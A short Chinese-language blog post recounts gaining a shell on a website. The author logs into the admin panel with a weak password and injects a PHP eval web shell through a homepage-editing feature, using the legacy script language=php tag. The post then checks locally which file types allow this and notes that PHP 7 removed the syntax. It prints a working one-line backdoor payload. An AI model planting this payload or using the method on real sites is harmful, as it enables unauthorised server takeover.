以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。
当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等可以拿shell的路都被阻止了,当时有一个可以控制前端页面的功能点
凭上面的解释就可以看出来,这个是可以通过这里来修改首页内容的,这里仅仅做一个小演示
可以发现js的代码是可以成功执行的,就可以通过了这个方法来拿shell了,因为js的language参数是可以支持其他的语言的执行的,具体的可以自己去尝试,这里我们使用的是
<script language=php>@eval($_POST['web']);</script>
我在本地进行一次测试,就可以展现出效果了
当时只是知道了这个方法,并没有对这个进行深入的了解,今天抽了点时间对这个重新进行了一次复盘
这个方法的利用条件的限制比较严格,必须要求被改变的位置是php文件,当时还是很懵的,并不知道为什么可以这样操作,所以我重新确定了一遍可以利用的条件点,看图就可以明白了。
fun.php 这个是数据库的调用
test.php
test1.php
test.html
好了,利用条件已经很明确了,必须要php下确实存在的才可以被利用,这个方法可用完全是因为php支持html的原因,也算是多一个方法了,php7移除该方法
学习更多技术,关注我: